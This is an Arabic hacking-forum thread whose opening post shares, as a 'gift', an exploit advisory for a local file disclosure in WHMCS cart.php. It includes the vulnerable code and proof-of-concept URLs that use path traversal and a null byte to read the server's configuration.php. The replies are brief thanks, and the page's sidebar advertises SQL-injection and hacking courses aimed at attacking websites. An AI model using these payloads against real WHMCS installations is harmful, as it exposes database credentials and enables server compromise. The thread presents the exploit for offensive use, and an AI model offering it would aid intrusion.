1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

ثغره من نوع برايفت اسحب روتات

الموضوع في '[ الـثـغـرات ]' بواسطة الهكر الاقرع HR, بتاريخ ‏19 ابريل 2013.

كاتب الموضوع : الهكر الاقرع HR المشاهدات : 2,104 الردود : 7 ‏19 ابريل 2013
حالة الموضوع:
مغلق
  1. غير متصل

    الهكر الاقرع HR
    rank
    Developer

    عضو منذ:
    ‏18 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    [​IMG]
    السلام عليكم ورحمة الله

    اليوم ثغرة حلوة هدية

    بدون اطالة في الكلام


    رابط الثغرة




    الثغره


    كود PHP:
    # Title      : WHMCompleteSolution (cart.php) Local File Disclosure
    # Author     : Lagripe-Dz
    # Product    : WHMCS ( WHMCompleteSolution )
    # Vendor     : http://whmcs.com/
    # Date       : 10/01/2011
    # Version    : 3.x.x , 4.0.x
    # Tested on  : linux+apache
     
    ================================================================
     
    Vuln filecart.php
    ---------
     
    Vuln code:
    ---------
     
    if ( 
    $a == "add" )
    {
       
    $templatefile "configureproductdomain";
        ....
    etc
    }
     
    if ( 
    $a == "login" )
    {
        
    $templatefile "login";
        ....
    etc
    }
     ...
    outputClientArea$templatefile$nowrapper );
    # outputClientArea function will display
    "./templates/orderforms/cart/{$templatefile}.tpl"
     
     
    Details :
    ---------
     
    if 
    variable "$ahas a true value .. will set "$templatefilevalue by
    default
    but when "$avalue didn't match the defaults values
    you can control "$templatefile" and use it as ( File Disclosure )
     
     
    Proof of Concept :
    ------------------
     
    http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
     
    http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00
     
     
    note* : show the page source to see Disclosure file.
     
    Solution :
    ----------
     
    the vendor Notificate
    update to the last version
     
    ================================================================


     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ś‡òÞ Ħąć
    rankrank
    Developer

    عضو منذ:
    ‏20 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك الف عافيه اخوي
     


  4. غير متصل

    الحوت الأزرق
    rank
    Developer

    عضو منذ:
    ‏20 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك العافيه
     


  5. غير متصل

    hacker.cydia
    rank
    Developer

    عضو منذ:
    ‏4 يونيو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    pc
    الإقامة:

    رد: ثغره من نوع برايفت اسحب روتات

    thnxx .... &:":
     


  6. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: ثغره من نوع برايفت اسحب روتات

    %:"
     


  7. غير متصل

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏21 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك الف عافية تسلم ع الطرح ال اكثر من رائع
     


  8. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: ثغره من نوع برايفت اسحب روتات

    {1!$8}
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...